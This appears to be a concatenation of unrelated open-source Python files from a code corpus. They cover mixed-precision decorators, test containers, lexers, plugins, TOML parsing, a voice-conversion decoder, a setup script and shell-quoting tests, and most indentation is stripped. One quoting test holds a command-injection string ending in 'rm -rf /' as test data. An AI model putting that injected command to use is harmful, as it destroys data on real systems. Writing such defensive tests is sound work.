        The same container type as ``inputs``, with all contained Tensors cast to ``dst_type``.
"""
if isinstance(inputs, torch.Tensor):
return inputs.to(dst_type)
elif isinstance(inputs, str):
return inputs
elif isinstance(inputs, np.ndarray):
return inputs
elif isinstance(inputs, abc.Mapping):
return type(inputs)({
k: cast_tensor_type(v, src_type, dst_type)
for k, v in inputs.items()
})
elif isinstance(inputs, abc.Iterable):
return type(inputs)(
cast_tensor_type(item, src_type, dst_type) for item in inputs)
else:
return inputs
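# Illustrative example (values are arbitrary assumptions, not part of mmcv):
#
#     >>> t = torch.zeros(2, dtype=torch.float)
#     >>> cast_tensor_type({'a': t, 'b': 'keep'}, torch.float, torch.half)['a'].dtype
#     torch.float16   # the string value 'b' is passed through unchanged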
def auto_fp16(apply_to=None, out_fp32=False):
"""Decorator to enable fp16 training automatically.
This decorator is useful when you write custom modules and want to support
    mixed precision training. If input arguments are fp32 tensors, they will
be converted to fp16 automatically. Arguments other than fp32 tensors are
ignored.
Args:
apply_to (Iterable, optional): The argument names to be converted.
`None` indicates all arguments.
out_fp32 (bool): Whether to convert the output back to fp32.
Example:
>>> import torch.nn as nn
>>> class MyModule1(nn.Module):
>>>
>>> # Convert x and y to fp16
>>> @auto_fp16()
>>> def forward(self, x, y):
>>> pass
>>> import torch.nn as nn
>>> class MyModule2(nn.Module):
>>>
>>> # convert pred to fp16
>>> @auto_fp16(apply_to=('pred', ))
>>> def do_something(self, pred, others):
>>> pass
"""
def auto_fp16_wrapper(old_func):
@functools.wraps(old_func)
def new_func(*args, **kwargs):
# check if the module has set the attribute `fp16_enabled`, if not,
# just fallback to the original method.
if not isinstance(args[0], torch.nn.Module):
raise TypeError('@auto_fp16 can only be used to decorate the '
'method of nn.Module')
if not (hasattr(args[0], 'fp16_enabled') and args[0].fp16_enabled):
return old_func(*args, **kwargs)
# get the arg spec of the decorated method
args_info = getfullargspec(old_func)
# get the argument names to be casted
args_to_cast = args_info.args if apply_to is None else apply_to
# convert the args that need to be processed
new_args = []
# NOTE: default args are not taken into consideration
if args:
arg_names = args_info.args[:len(args)]
for i, arg_name in enumerate(arg_names):
if arg_name in args_to_cast:
new_args.append(
cast_tensor_type(args[i], torch.float, torch.half))
else:
new_args.append(args[i])
# convert the kwargs that need to be processed
new_kwargs = {}
if kwargs:
for arg_name, arg_value in kwargs.items():
if arg_name in args_to_cast:
new_kwargs[arg_name] = cast_tensor_type(
arg_value, torch.float, torch.half)
else:
new_kwargs[arg_name] = arg_value
# apply converted arguments to the decorated method
output = old_func(*new_args, **new_kwargs)
# cast the results back to fp32 if necessary
if out_fp32:
output = cast_tensor_type(output, torch.half, torch.float)
return output
return new_func
return auto_fp16_wrapper
def force_fp32(apply_to=None, out_fp16=False):
"""Decorator to convert input arguments to fp32 in force.
This decorator is useful when you write custom modules and want to support
mixed precision training. If there are some inputs that must be processed
    in fp32 mode, then this decorator can handle it. If input arguments are
fp16 tensors, they will be converted to fp32 automatically. Arguments other
than fp16 tensors are ignored.
Args:
apply_to (Iterable, optional): The argument names to be converted.
`None` indicates all arguments.
out_fp16 (bool): Whether to convert the output back to fp16.
Example:
>>> import torch.nn as nn
>>> class MyModule1(nn.Module):
>>>
>>> # Convert x and y to fp32
>>> @force_fp32()
>>> def loss(self, x, y):
>>> pass
>>> import torch.nn as nn
>>> class MyModule2(nn.Module):
>>>
>>> # convert pred to fp32
>>> @force_fp32(apply_to=('pred', ))
>>> def post_process(self, pred, others):
>>> pass
"""
def force_fp32_wrapper(old_func):
@functools.wraps(old_func)
def new_func(*args, **kwargs):
# check if the module has set the attribute `fp16_enabled`, if not,
# just fallback to the original method.
if not isinstance(args[0], torch.nn.Module):
raise TypeError('@force_fp32 can only be used to decorate the '
'method of nn.Module')
if not (hasattr(args[0], 'fp16_enabled') and args[0].fp16_enabled):
return old_func(*args, **kwargs)
# get the arg spec of the decorated method
args_info = getfullargspec(old_func)
# get the argument names to be casted
args_to_cast = args_info.args if apply_to is None else apply_to
# convert the args that need to be processed
new_args = []
if args:
arg_names = args_info.args[:len(args)]
for i, arg_name in enumerate(arg_names):
if arg_name in args_to_cast:
new_args.append(
cast_tensor_type(args[i], torch.half, torch.float))
else:
new_args.append(args[i])
# convert the kwargs that need to be processed
new_kwargs = dict()
if kwargs:
for arg_name, arg_value in kwargs.items():
if arg_name in args_to_cast:
new_kwargs[arg_name] = cast_tensor_type(
arg_value, torch.half, torch.float)
else:
new_kwargs[arg_name] = arg_value
# apply converted arguments to the decorated method
output = old_func(*new_args, **new_kwargs)
# cast the results back to fp32 if necessary
if out_fp16:
output = cast_tensor_type(output, torch.float, torch.half)
return output
return new_func
return force_fp32_wrapper
def _allreduce_coalesced(tensors, world_size, bucket_size_mb=-1):
if bucket_size_mb > 0:
bucket_size_bytes = bucket_size_mb * 1024 * 1024
buckets = _take_tensors(tensors, bucket_size_bytes)
else:
buckets = OrderedDict()
for tensor in tensors:
tp = tensor.type()
if tp not in buckets:
buckets[tp] = []
buckets[tp].append(tensor)
buckets = buckets.values()
for bucket in buckets:
flat_tensors = _flatten_dense_tensors(bucket)
dist.all_reduce(flat_tensors)
flat_tensors.div_(world_size)
for tensor, synced in zip(
bucket, _unflatten_dense_tensors(flat_tensors, bucket)):
tensor.copy_(synced)
def allreduce_grads(params, coalesce=True, bucket_size_mb=-1):
"""Allreduce gradients.
Args:
        params (list[torch.nn.Parameter]): List of parameters of a model.
        coalesce (bool, optional): Whether to allreduce gradients as a whole.
Defaults to True.
bucket_size_mb (int, optional): Size of bucket, the unit is MB.
Defaults to -1.
"""
grads = [
param.grad.data for param in params
if param.requires_grad and param.grad is not None
]
world_size = dist.get_world_size()
if coalesce:
_allreduce_coalesced(grads, world_size, bucket_size_mb)
else:
for tensor in grads:
dist.all_reduce(tensor.div_(world_size))
def wrap_fp16_model(model):
"""Wrap the FP32 model to FP16.
1. Convert FP32 model to FP16.
    2. Keep some necessary layers in FP32, e.g., normalization layers.
Args:
model (nn.Module): Model in FP32.
"""
# convert model to fp16
model.half()
# patch the normalization layers to make it work in fp32 mode
patch_norm_fp32(model)
# set `fp16_enabled` flag
for m in model.modules():
if hasattr(m, 'fp16_enabled'):
m.fp16_enabled = True
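# A minimal usage sketch (an illustration, not part of mmcv itself; `MyDetector`
# is a hypothetical nn.Module whose @auto_fp16/@force_fp32-decorated methods
# check the `fp16_enabled` flag set above):
#
#     model = MyDetector()
#     wrap_fp16_model(model)      # weights become fp16, norm layers stay fp32
#     losses = model(images)      # decorated methods now cast their inputs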
def patch_norm_fp32(module):
"""Recursively convert normalization layers from FP16 to FP32.
Args:
        module (nn.Module): The module whose normalization layers are to be converted back to FP32.
Returns:
nn.Module: The converted module, the normalization layers have been
converted to FP32.
"""
if isinstance(module, (nn.modules.batchnorm._BatchNorm, nn.GroupNorm)):
module.float()
if isinstance(module, nn.GroupNorm) or torch.__version__ < '1.3':
module.forward = patch_forward_method(module.forward, torch.half,
torch.float)
for child in module.children():
patch_norm_fp32(child)
return module
def patch_forward_method(func, src_type, dst_type, convert_output=True):
"""Patch the forward method of a module.
Args:
func (callable): The original forward method.
src_type (torch.dtype): Type of input arguments to be converted from.
dst_type (torch.dtype): Type of input arguments to be converted to.
convert_output (bool): Whether to convert the output back to src_type.
Returns:
callable: The patched forward method.
"""
def new_forward(*args, **kwargs):
output = func(*cast_tensor_type(args, src_type, dst_type),
**cast_tensor_type(kwargs, src_type, dst_type))
if convert_output:
output = cast_tensor_type(output, dst_type, src_type)
return output
return new_forward
|
testcontainers/google/__init__.py
|
singerjess/testcontainers-python
| 465 |
65056
|
"""
Google Cloud Emulators
======================
Allows to spin up google cloud emulators, such as PubSub.
"""
from .pubsub import PubSubContainer # noqa
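# A minimal usage sketch (hypothetical; the exact accessor methods on
# PubSubContainer may differ between testcontainers-python versions):
#
#     from testcontainers.google import PubSubContainer
#
#     with PubSubContainer() as pubsub:
#         # the running emulator's host/port can now be handed to a Pub/Sub client
#         ...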
|
chrome/test/chromedriver/embed_mobile_devices_in_cpp.py
|
zipated/src
| 2,151 |
65057
|
<reponame>zipated/src
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Embeds standalone JavaScript snippets in C++ code.
The script requires the Source/devtools/front_end/emulated_devices/module.json
file from Blink that lists the known mobile devices to be passed in as the only
argument. The list of known devices will be written to a C-style string to be
parsed with JSONReader.
"""
import json
import optparse
import os
import re
import subprocess
import sys
import chrome_paths
import cpp_source
def main():
parser = optparse.OptionParser()
parser.add_option(
'', '--version-file', type='string',
default=os.path.join(chrome_paths.GetSrc(), 'chrome', 'VERSION'),
help='Path to Chrome version file')
parser.add_option(
'', '--directory', type='string', default='.',
help='Path to directory where the cc/h files should be created')
options, args = parser.parse_args()
# The device userAgent string may contain '%s', which should be replaced with
# current Chrome version. First we read the version file.
version_parts = ['MAJOR', 'MINOR', 'BUILD', 'PATCH']
version = []
version_file = open(options.version_file, 'r')
for part in version_parts:
# The version file should have 4 lines, with format like MAJOR=63
components = version_file.readline().split('=')
if len(components) != 2 or components[0].strip() != part:
print 'Bad version file'
return 1
version.append(components[1].strip())
# Join parts of version together using '.' as separator
version = '.'.join(version)
devices = {}
file_name = args[0]
inside_list = False
with open(file_name, 'r') as f:
emulated_devices = json.load(f)
extensions = emulated_devices['extensions']
for extension in extensions:
if extension['type'] == 'emulated-device':
device = extension['device']
title = device['title']
titles = [title]
# For 'iPhone 6/7/8', also add ['iPhone 6', 'iPhone 7', 'iPhone 8'] for
# backward compatibility.
if '/' in title:
words = title.split()
for i in range(len(words)):
if '/' in words[i]:
# Only support one word containing '/'
break
tokens = words[i].split('/')
for token in tokens:
words[i] = token
titles.append(' '.join(words))
for title in titles:
devices[title] = {
'userAgent': device['user-agent'].replace('%s', version),
'width': device['screen']['vertical']['width'],
'height': device['screen']['vertical']['height'],
'deviceScaleFactor': device['screen']['device-pixel-ratio'],
'touch': 'touch' in device['capabilities'],
'mobile': 'mobile' in device['capabilities'],
}
output_dir = 'chrome/test/chromedriver/chrome'
cpp_source.WriteSource('mobile_device_list',
output_dir,
options.directory,
{'kMobileDevices': json.dumps(devices)})
clang_format = ['clang-format', '-i']
subprocess.Popen(clang_format + ['%s/mobile_device_list.cc' % output_dir])
subprocess.Popen(clang_format + ['%s/mobile_device_list.h' % output_dir])
if __name__ == '__main__':
sys.exit(main())
|
chatette/parsing/lexing/rule_arg_decl.py
|
SimGus/Chatette
| 263 |
65063
|
<reponame>SimGus/Chatette
# coding: utf-8
"""
Module `chatette.parsing.lexing.rule_arg_decl`
Contains the definition of the class that represents the lexing rule
to tokenize the declaration of an argument in a unit declaration.
"""
from chatette.parsing.lexing.lexing_rule import LexingRule
from chatette.parsing.lexing import LexicalToken, TerminalType
from chatette.parsing.utils import ARG_SYM, extract_identifier
class RuleArgDecl(LexingRule):
def _apply_strategy(self, **kwargs):
if not self._text.startswith(ARG_SYM, self._next_index):
self.error_msg = \
"Invalid token. Expected an argument declaration there " + \
"(starting with '" + ARG_SYM + "')."
return False
self._next_index += 1
self._update_furthest_matched_index()
self._tokens.append(
LexicalToken(TerminalType.arg_marker, ARG_SYM)
)
arg_name = extract_identifier(self._text, self._next_index)
if arg_name is None:
self.error_msg = \
"Didn't expect the line to end there. Expected an argument name."
return False
elif len(arg_name) == 0:
self.error_msg = \
"Couldn't extract the argument name. Arguments must have a name."
return False
self._next_index += len(arg_name)
self._update_furthest_matched_index()
self._tokens.append(LexicalToken(TerminalType.arg_name, arg_name))
return True
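# Illustration (an assumed input, not part of the original module): applied to a
# text such as "$arg" with `self._next_index` at the ARG_SYM character, this rule
# appends two tokens, (arg_marker, ARG_SYM) and (arg_name, "arg"), and returns True.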
|
ckanext/example_isignal/plugin.py
|
gg2/ckan
| 2,805 |
65074
|
# -*- coding: utf-8 -*-
import ckan.plugins as p
def x2(sender):
return sender * 2
def x10(sender):
return sender * 10
class ExampleISignalPlugin(p.SingletonPlugin):
p.implements(p.ISignal)
# ISignal
def get_signal_subscriptions(self):
return {
p.toolkit.signals.ckanext.signal(u'isignal_number'): [
x2,
{u'receiver': x10, u'sender': 10}
]
}
|
zenml/steps/evaluator/tfma_module.py
|
ramitsurana/zenml
| 1,275 |
65076
|
from typing import Dict, Optional, Text, List
import apache_beam as beam
import tensorflow_model_analysis as tfma
from tensorflow_model_analysis import config
from tensorflow_model_analysis import constants
from tensorflow_model_analysis import model_util
from tensorflow_model_analysis import types
from tensorflow_model_analysis.extractors import extractor
from tfx_bsl.tfxio import tensor_adapter
BATCHED_PREDICT_EXTRACTOR_STAGE_NAME = 'ExtractBatchPredictions'
def custom_extractors(eval_config,
eval_shared_model,
tensor_adapter_config
) -> List[tfma.extractors.Extractor]:
return tfma.default_extractors(
eval_config=eval_config,
eval_shared_model=eval_shared_model,
tensor_adapter_config=tensor_adapter_config,
custom_predict_extractor=BatchedPredictExtractor(eval_config,
eval_shared_model,
tensor_adapter_config
))
def BatchedPredictExtractor(
eval_config: config.EvalConfig,
eval_shared_model: types.MaybeMultipleEvalSharedModels,
tensor_adapter_config: Optional[
tensor_adapter.TensorAdapterConfig] = None,
) -> extractor.Extractor:
eval_shared_models = model_util.verify_and_update_eval_shared_models(
eval_shared_model)
return extractor.Extractor(
stage_name=BATCHED_PREDICT_EXTRACTOR_STAGE_NAME,
ptransform=_ExtractBatchedPredictions(
eval_config=eval_config,
eval_shared_models={m.model_name: m for m in eval_shared_models},
tensor_adapter_config=tensor_adapter_config))
@beam.ptransform_fn
@beam.typehints.with_input_types(types.Extracts)
@beam.typehints.with_output_types(types.Extracts)
def _ExtractBatchedPredictions(
extracts: beam.pvalue.PCollection,
eval_config: config.EvalConfig,
eval_shared_models: Dict[Text, types.EvalSharedModel],
tensor_adapter_config: Optional[
tensor_adapter.TensorAdapterConfig] = None,
) -> beam.pvalue.PCollection:
signature_names = {}
for spec in eval_config.model_specs:
model_name = '' if len(eval_config.model_specs) == 1 else spec.name
signature_names[model_name] = [spec.signature_name]
return (extracts
| 'Predict' >> beam.ParDo(
model_util.ModelSignaturesDoFn(
eval_config=eval_config,
eval_shared_models=eval_shared_models,
signature_names={
constants.PREDICTIONS_KEY: signature_names},
prefer_dict_outputs=True,
tensor_adapter_config=tensor_adapter_config)))
|
Python/LongestSubstringWithoutRepeatingCharactersTest.py
|
TonnyL/Windary
| 205 |
65081
|
<filename>Python/LongestSubstringWithoutRepeatingCharactersTest.py
from unittest import TestCase
from LongestSubstringWithoutRepeatingCharacters import LongestSubstringWithoutRepeatingCharacters
class TestLongestSubstringWithoutRepeatingCharacters(TestCase):
def test_lengthOfLongestSubstring(self):
lswrc = LongestSubstringWithoutRepeatingCharacters()
# Expected: wke, 3
self.assertTrue(lswrc.lengthOfLongestSubstring("pwwkew") == 3)
# Expected: b, 1
self.assertTrue(lswrc.lengthOfLongestSubstring("bbbbb") == 1)
# Expected: abc, 3
self.assertTrue(lswrc.lengthOfLongestSubstring("abcabcbb") == 3)
# Expected: vdf, 3
self.assertTrue(lswrc.lengthOfLongestSubstring("dvdf") == 3)
|
example/python/permissions/can_detach_role.py
|
akshatkarani/iroha
| 1,467 |
65092
|
#
# Copyright Soramitsu Co., Ltd. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
from iroha import Iroha, IrohaCrypto
from iroha import primitive_pb2
import commons
admin = commons.new_user('admin@test')
alice = commons.new_user('alice@test')
iroha = Iroha(admin['id'])
@commons.hex
def genesis_tx():
test_permissions = [primitive_pb2.can_detach_role]
genesis_commands = commons.genesis_block(admin, alice, test_permissions)
tx = iroha.transaction(genesis_commands)
IrohaCrypto.sign_transaction(tx, admin['key'])
return tx
@commons.hex
def detach_role_tx():
tx = iroha.transaction([
iroha.command('DetachRole', account_id=admin['id'], role_name='test_role')
], creator_account=alice['id'])
IrohaCrypto.sign_transaction(tx, alice['key'])
return tx
|
venv/Lib/site-packages/notebook/terminal/handlers.py
|
BoxicaLion/BasicMathFormulas
| 445 |
65106
|
#encoding: utf-8
"""Tornado handlers for the terminal emulator."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from tornado import web
import terminado
from notebook._tz import utcnow
from ..base.handlers import IPythonHandler
from ..base.zmqhandlers import WebSocketMixin
class TerminalHandler(IPythonHandler):
"""Render the terminal interface."""
@web.authenticated
def get(self, term_name):
self.write(self.render_template('terminal.html',
ws_path="terminals/websocket/%s" % term_name))
class TermSocket(WebSocketMixin, IPythonHandler, terminado.TermSocket):
def origin_check(self):
"""Terminado adds redundant origin_check
Tornado already calls check_origin, so don't do anything here.
"""
return True
def get(self, *args, **kwargs):
if not self.get_current_user():
raise web.HTTPError(403)
return super(TermSocket, self).get(*args, **kwargs)
def on_message(self, message):
super(TermSocket, self).on_message(message)
self.application.settings['terminal_last_activity'] = utcnow()
def write_message(self, message, binary=False):
super(TermSocket, self).write_message(message, binary=binary)
self.application.settings['terminal_last_activity'] = utcnow()
|
cclib/bridge/cclib2pyquante.py
|
chemistry-scripts/cclib
| 224 |
65115
|
<reponame>chemistry-scripts/cclib
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020, the cclib development team
#
# This file is part of cclib (http://cclib.github.io) and is distributed under
# the terms of the BSD 3-Clause License.
"""Bridge for using cclib data in PyQuante (http://pyquante.sourceforge.net)."""
import numpy
from cclib.parser.utils import find_package
class MissingAttributeError(Exception):
pass
_found_pyquante2 = find_package("pyquante2")
if _found_pyquante2:
from pyquante2 import molecule
def _check_pyquante():
if not _found_pyquante2:
raise ImportError("You must install `pyquante2` to use this function")
def makepyquante(data):
"""Create a PyQuante Molecule from ccData object."""
_check_pyquante()
# Check required attributes.
required_attrs = {"atomcoords", "atomnos"}
missing = [x for x in required_attrs if not hasattr(data, x)]
if missing:
missing = " ".join(missing)
raise MissingAttributeError(
"Could not create pyquante molecule due to missing attribute: {}".format(missing)
)
# In pyquante2, molecular geometry is specified in a format of:
# [(3,.0000000000, .0000000000, .0000000000), (1, .0000000000, .0000000000,1.629912)]
moldesc = numpy.insert(data.atomcoords[-1], 0, data.atomnos, 1).tolist()
return molecule(
[tuple(x) for x in moldesc],
units="Angstroms",
charge=data.charge,
multiplicity=data.mult,
)
del find_package
|
poetry/core/_vendor/tomlkit/source.py
|
avoltz/poetry-core
| 18,636 |
65118
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import itertools
from copy import copy
from typing import Any
from typing import Optional
from typing import Tuple
from typing import Type
from ._compat import PY2
from ._compat import unicode
from .exceptions import ParseError
from .exceptions import UnexpectedCharError
from .exceptions import UnexpectedEofError
from .toml_char import TOMLChar
class _State:
def __init__(
self, source, save_marker=False, restore=False
): # type: (_Source, Optional[bool], Optional[bool]) -> None
self._source = source
self._save_marker = save_marker
self.restore = restore
def __enter__(self): # type: () -> None
# Entering this context manager - save the state
if PY2:
# Python 2.7 does not allow to directly copy
# an iterator, so we have to make tees of the original
# chars iterator.
self._source._chars, self._chars = itertools.tee(self._source._chars)
else:
self._chars = copy(self._source._chars)
self._idx = self._source._idx
self._current = self._source._current
self._marker = self._source._marker
return self
def __exit__(self, exception_type, exception_val, trace):
# Exiting this context manager - restore the prior state
if self.restore or exception_type:
self._source._chars = self._chars
self._source._idx = self._idx
self._source._current = self._current
if self._save_marker:
self._source._marker = self._marker
class _StateHandler:
"""
State preserver for the Parser.
"""
def __init__(self, source): # type: (Source) -> None
self._source = source
self._states = []
def __call__(self, *args, **kwargs):
return _State(self._source, *args, **kwargs)
def __enter__(self): # type: () -> None
state = self()
self._states.append(state)
return state.__enter__()
def __exit__(self, exception_type, exception_val, trace):
state = self._states.pop()
return state.__exit__(exception_type, exception_val, trace)
class Source(unicode):
EOF = TOMLChar("\0")
def __init__(self, _): # type: (unicode) -> None
super(Source, self).__init__()
# Collection of TOMLChars
self._chars = iter([(i, TOMLChar(c)) for i, c in enumerate(self)])
self._idx = 0
self._marker = 0
self._current = TOMLChar("")
self._state = _StateHandler(self)
self.inc()
def reset(self):
# initialize both idx and current
self.inc()
# reset marker
self.mark()
@property
def state(self): # type: () -> _StateHandler
return self._state
@property
def idx(self): # type: () -> int
return self._idx
@property
def current(self): # type: () -> TOMLChar
return self._current
@property
def marker(self): # type: () -> int
return self._marker
def extract(self): # type: () -> unicode
"""
Extracts the value between marker and index
"""
return self[self._marker : self._idx]
def inc(self, exception=None): # type: (Optional[Type[ParseError]]) -> bool
"""
Increments the parser if the end of the input has not been reached.
Returns whether or not it was able to advance.
"""
try:
self._idx, self._current = next(self._chars)
return True
except StopIteration:
self._idx = len(self)
self._current = self.EOF
if exception:
raise self.parse_error(exception)
return False
def inc_n(self, n, exception=None): # type: (int, Exception) -> bool
"""
Increments the parser by n characters
if the end of the input has not been reached.
"""
for _ in range(n):
if not self.inc(exception=exception):
return False
return True
def consume(self, chars, min=0, max=-1):
"""
        Consume characters from the input while they are in ``chars``, until the min/max count is satisfied.
"""
while self.current in chars and max != 0:
min -= 1
max -= 1
if not self.inc():
break
# failed to consume minimum number of characters
if min > 0:
            raise self.parse_error(UnexpectedCharError)
def end(self): # type: () -> bool
"""
Returns True if the parser has reached the end of the input.
"""
return self._current is self.EOF
def mark(self): # type: () -> None
"""
Sets the marker to the index's current position
"""
self._marker = self._idx
def parse_error(
self, exception=ParseError, *args
): # type: (Type[ParseError], Any) -> ParseError
"""
Creates a generic "parse error" at the current position.
"""
line, col = self._to_linecol()
return exception(line, col, *args)
def _to_linecol(self): # type: () -> Tuple[int, int]
cur = 0
for i, line in enumerate(self.splitlines()):
if cur + len(line) + 1 > self.idx:
return (i + 1, self.idx - cur)
cur += len(line) + 1
return len(self.splitlines()), 0
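# Behaviour sketch (inferred from the class above, not an official example):
#
#     src = Source("key = 1")
#     src.mark(); src.inc_n(3)
#     src.extract()   # -> "key" (the slice between the marker and the index)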
|
modules/vc_decoder.py
|
shaun95/cotatron
| 202 |
65130
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .cond_bn import ConditionalBatchNorm1d
# adopted Generator ResBlock from https://arxiv.org/abs/1909.11646
class GBlock(nn.Module):
def __init__(self, in_channels, out_channels, condition_dim):
super().__init__()
self.cond_bn = nn.ModuleList([
ConditionalBatchNorm1d(in_channels if i==0 else out_channels, condition_dim)
for i in range(4)])
self.leaky_relu = nn.LeakyReLU(0.2)
self.cnn = nn.ModuleList([
nn.Conv1d(in_channels if i==0 else out_channels, out_channels,
kernel_size=3, dilation=2**i, padding=2**i)
for i in range(4)])
self.shortcut = nn.Conv1d(in_channels, out_channels, kernel_size=1)
def forward(self, x, z, mask=None):
identity = x
x = self.cnn[0](self.leaky_relu(self.cond_bn[0](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = self.cnn[1](self.leaky_relu(self.cond_bn[1](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = x + self.shortcut(identity)
if mask is not None:
x.masked_fill_(mask, 0.0)
identity = x
x = self.cnn[2](self.leaky_relu(self.cond_bn[2](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = self.cnn[3](self.leaky_relu(self.cond_bn[3](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = x + identity
return x
class VCDecoder(nn.Module):
def __init__(self, hp):
super().__init__()
self.stem = nn.Conv1d(hp.chn.encoder + hp.chn.residual_out, hp.chn.gblock[0], kernel_size=7, padding=3)
self.gblock = nn.ModuleList([
GBlock(in_channels, out_channels, hp.chn.speaker.token)
for in_channels, out_channels in
zip(list(hp.chn.gblock)[:-1], hp.chn.gblock[1:])])
self.final = nn.Conv1d(hp.chn.gblock[-1], hp.audio.n_mel_channels, kernel_size=1)
def forward(self, x, speaker_emb, mask=None):
# x: linguistic features + pitch info.
# [B, chn.encoder + chn.residual_out, T_dec]
x = self.stem(x) # [B, chn.gblock[0], T]
if mask is not None:
x.masked_fill_(mask, 0.0)
for gblock in self.gblock:
x = gblock(x, speaker_emb, mask)
# x: [B, chn.gblock[-1], T]
x = self.final(x) # [B, M, T]
if mask is not None:
x.masked_fill_(mask, 0.0)
return x
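# Shape sketch (names follow the hp fields referenced above; concrete sizes are
# assumptions for illustration):
#
#     x           : [B, hp.chn.encoder + hp.chn.residual_out, T_dec]
#     speaker_emb : [B, hp.chn.speaker.token]
#     returned mel: [B, hp.audio.n_mel_channels, T_dec]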
|
setup.py
|
codalab/codalab-worksheets
| 236 |
65152
|
from setuptools import setup, find_packages
from setuptools.command.install import install
import os
import setuptools
import sys
# should match codalab/common.py#CODALAB_VERSION
CODALAB_VERSION = "1.1.4"
class Install(install):
_WARNING_TEMPLATE = (
'\n\n\033[1m\033[93mWarning! CodaLab was installed at {}, which is not\n'
'one of the following paths in $PATH:\n\n{}\n\nConsider adding {} to $PATH\n'
'to use the CodaLab CLI. You can do this by {}\033[0m\n\n'
)
_UNIX_FIX = 'appending the following line to your .bashrc:\nexport PATH="$PATH:{}"'
_WINDOWS_FIX = (
'by selecting System from the Control Panel, selecting Advanced system\n'
'settings, clicking Environment Variables and adding {} to the list.'
)
_WINDOWS_PLATFORM_VALUES = {'win32', 'cygwin'}
@staticmethod
def _build_fix_message(installed_path):
return (
Install._WINDOWS_FIX.format(installed_path)
if sys.platform in Install._WINDOWS_PLATFORM_VALUES
else Install._UNIX_FIX.format(installed_path)
)
def run(self):
install.run(self)
self._check_path()
def _check_path(self):
cl_path = self.install_scripts
executable_paths = os.environ['PATH'].split(os.pathsep)
if cl_path not in executable_paths:
# Prints a yellow, bold warning message in regards to the installation path not in $PATH
print(
Install._WARNING_TEMPLATE.format(
cl_path,
'\n'.join(executable_paths),
cl_path,
Install._build_fix_message(cl_path),
)
)
def get_requirements(*requirements_file_paths):
requirements = []
for requirements_file_path in requirements_file_paths:
with open(requirements_file_path) as requirements_file:
for line in requirements_file:
if line[0:2] != '-r':
requirements.append(line.strip())
return requirements
if int(setuptools.__version__.split('.')[0]) < 25:
print(
"WARNING: Please upgrade setuptools to a newer version, otherwise installation may break. "
"Recommended command: `pip3 install -U setuptools`"
)
setup(
name='codalab',
version=CODALAB_VERSION,
description='CLI for CodaLab, a platform for reproducible computation',
long_description=(
'Visit https://worksheets.codalab.org/ or setup your own server by following the '
'instructions in the documentation (https://codalab-worksheets.readthedocs.io/en/latest/Server-Setup).'
),
url='https://github.com/codalab/codalab-worksheets',
author='CodaLab',
author_email='<EMAIL>',
license='Apache License 2.0',
keywords='codalab reproducible computation worksheets competitions',
packages=find_packages(exclude=["tests*"]),
classifiers=[
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: Apache Software License",
],
py_modules=['codalab_service'],
python_requires='~=3.6',
cmdclass={'install': Install},
include_package_data=True,
install_requires=get_requirements('requirements.txt'),
entry_points={
'console_scripts': [
'cl=codalab.bin.cl:main',
'cl-server=codalab.bin.server:main',
'cl-bundle-manager=codalab.bin.bundle_manager:main',
'codalab-service=codalab_service:main',
'cl-worker=codalab.worker.main:main',
'cl-worker-manager=codalab.worker_manager.main:main',
'cl-competitiond=scripts.competitiond:main',
]
},
zip_safe=False,
)
|
old/relu_static.py
|
flint-stone/OpenTPU
| 248 |
65154
|
<filename>old/relu_static.py
# Function: Relu and normalization
# Comments: offset defined during design phase (not runtime)
import pyrtl
# relu and normalization
def relu_nrml(din, offset=0):
assert len(din) == 32
assert offset <= 24
dout = pyrtl.WireVector(32)
with pyrtl.conditional_assignment:
with din[-1] == 0:
dout |= din
with pyrtl.otherwise:
dout |= 0
return dout[24-offset:32-offset]
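# Worked example (assumed values, for illustration only): with offset=24 the
# returned slice is dout[0:8], i.e. the 8 least-significant bits after ReLU;
# for din=300 (non-negative) this yields 300 & 0xFF == 44.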
# Test: collects only the 8 LSBs (after relu)
relu_in = pyrtl.Register(bitwidth=32, name='din')
relu_in.next <<= 300
offset = 24
dout = relu_nrml(relu_in, offset)
relu_out = pyrtl.Register(bitwidth=8, name='dout')
relu_out.next <<= dout
# simulate the instantiated design for 35 cycles
sim_trace = pyrtl.SimulationTrace()
sim = pyrtl.Simulation(tracer=sim_trace)
for cycle in range(35):
sim.step({})
sim_trace.render_trace()
|
adb/systrace/catapult/devil/devil/utils/cmd_helper_test.py
|
mohanedmoh/TBS
| 2,151 |
65169
|
<gh_stars>1000+
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for the cmd_helper module."""
import unittest
import subprocess
import sys
import time
from devil import devil_env
from devil.utils import cmd_helper
with devil_env.SysPath(devil_env.PYMOCK_PATH):
import mock # pylint: disable=import-error
class CmdHelperSingleQuoteTest(unittest.TestCase):
def testSingleQuote_basic(self):
self.assertEquals('hello',
cmd_helper.SingleQuote('hello'))
def testSingleQuote_withSpaces(self):
self.assertEquals("'hello world'",
cmd_helper.SingleQuote('hello world'))
def testSingleQuote_withUnsafeChars(self):
self.assertEquals("""'hello'"'"'; rm -rf /'""",
cmd_helper.SingleQuote("hello'; rm -rf /"))
def testSingleQuote_dontExpand(self):
test_string = 'hello $TEST_VAR'
cmd = 'TEST_VAR=world; echo %s' % cmd_helper.SingleQuote(test_string)
self.assertEquals(test_string,
cmd_helper.GetCmdOutput(cmd, shell=True).rstrip())
class CmdHelperDoubleQuoteTest(unittest.TestCase):
def testDoubleQuote_basic(self):
self.assertEquals('hello',
cmd_helper.DoubleQuote('hello'))
def testDoubleQuote_withSpaces(self):
self.assertEquals('"hello world"',
cmd_helper.DoubleQuote('hello world'))
def testDoubleQuote_withUnsafeChars(self):
self.assertEquals('''"hello\\"; rm -rf /"''',
cmd_helper.DoubleQuote('hello"; rm -rf /'))
def testSingleQuote_doExpand(self):
test_string = 'hello $TEST_VAR'
